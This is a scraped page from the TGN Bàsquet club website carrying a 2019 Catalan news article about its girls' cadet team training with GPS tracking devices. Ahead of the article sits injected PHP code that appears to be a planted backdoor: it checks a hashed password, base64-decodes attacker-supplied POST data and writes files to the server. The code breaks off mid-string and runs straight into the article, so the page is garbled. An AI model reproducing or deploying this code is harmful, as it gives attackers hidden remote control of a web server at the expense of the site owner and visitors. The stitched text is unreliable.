function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení de segon any entrena amb una tecnologia que utilitzen els Memphis Grizzlies - Tgn Bàsquet Club -

El cadet femení de segon any entrena amb una tecnologia que utilitzen els Memphis Grizzlies

By
Updated: juliol 7, 2019

Tot i ser un club modest que ha experimentat un gran creixement els últims anys però que es finança amb recursos propis, el TGN Bàsquet no para de fer salts qualitatius importants. El cadet femení de segon any, que fa setmanes que s’entrena per preparar les fases d’accés a categoria preferent (la màxima de Catalunya) que enguany es disputaran entre el 12 i 14 de juliol (i no a l’agost com s’acostumava a fer fins ara), utilitza una tecnologia que actualment fan servir els Memphis Grizzlies de l’NBA. Es tracta d’uns dispositius GPS que permeten registrar dades de cada jugadora durant els entrenaments i que ajudaran a avaluar la preparació física de l’equip i, fins i tot, personalitzar els exercicis en virtut dels resultats aportats pel sistema.

El responsable d’aquest avenç tecnològic al club lila que s’utilitza en la millor lliga de bàsquet el món (els Washington Wizards també la utilitzen regularment i, puntualment, altres equips de l’NBA) és Gerard Merino. Aquest preparador físic va arribar la passada temporada al TGN Bàquet i forma part d’una nova fornada de professionals de la preparació física que fan servir tecnologia punta per millorar el rendiment dels esportistes. «Fem servir uns dispositius GPS que porten, a més, un acceleròmetre i un giroscopi. Les dades ens permeten saber la velocitat màxima de cada jugadora, la velocitat contínua, l’acceleració màxima, la distància recorreguda, el metabolic power (relació entre despesa energètica —la quantitat de força necessària per desplaçar el propi cos—, potència de les accions i el temps d’aquestes) i moltes altres dades. Amb aquests dispositius podem saber, per exemple, si una jugadora frena molt fort, amb violència, en relació a una altra jugadora. Aquest tipus d’aturades poden provocar una fatiga més gran en l’esportista i lesions, és clar. Això ens permet adaptar el nostre treball, fer exercicis més acurats, personalitzats a cada jugadora», diu Merino.

Les dades recollides per cada dispositiu es transfereixen a un ordinador (es poden connectar 16 aparells a la vegada) on el software del sistema revela les dades, que després són analitzades pel professional, en aquest cas Gerard Merino, que pot adaptar la planificació física en relació al resultats.

Els dispositius pertanyen a l’empresa especialitzada Smart Performance&Sport Science. No es tracta de cap empresa nord-americana, sinó que és de Cambrils i Merino hi treballa. «Per l’equip de cadets és fantàstic disposar d’un material així per poder-hi treballar i a l’empresa també li va bé perquè pot provar la tecnologia en situacions reals d’alta competició», diu aquest preparador físic del TGN Bàsquet.

De fet, Merino, que s’ha centrat en el món de la investigació acadèmica, ja va explicar només arribar al TGN Bàsquet les virtuts d’aquesta tecnologia: «El projecte on vaig treballar dins de l’equip d’investigació buscava aconseguir com democratitzar l’ús del GPS en el món de l’esport. Aquest dispositiu aporta moltes dades i aconseguir que aquests aparells fossin com més senzills millor perquè arribessin a tot el món de l’esport i no només al món professional, era la nostra tasca».

El programa conté els valors estàndard per a cada categoria (edat) i les dades obtingudes pels dispositius es comparen amb aquests valors. Això permet el preparador físic saber si els exercicis que ha fet són adequats o bé els ha d’adaptar. El software també permet introduir les dades físiques de cada jugadora (alçada, pes, percentatge de greix, etc.).

«És una tecnologia molt útil i que permet treure més rendiment a les jugadores i exposar-les a menys lesions per càrrega de treball», explica Merino, que comenta els resultats amb l’entrenador de l’equip, Albert del Rey, perquè aquest prengui les millors decisions pel que fa a la planificació en vista a la important competició que han d’afrontar en pocs dies (el 10 de juliol es farà el sorteig per conèixer els rivals i els horaris dels partits).

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *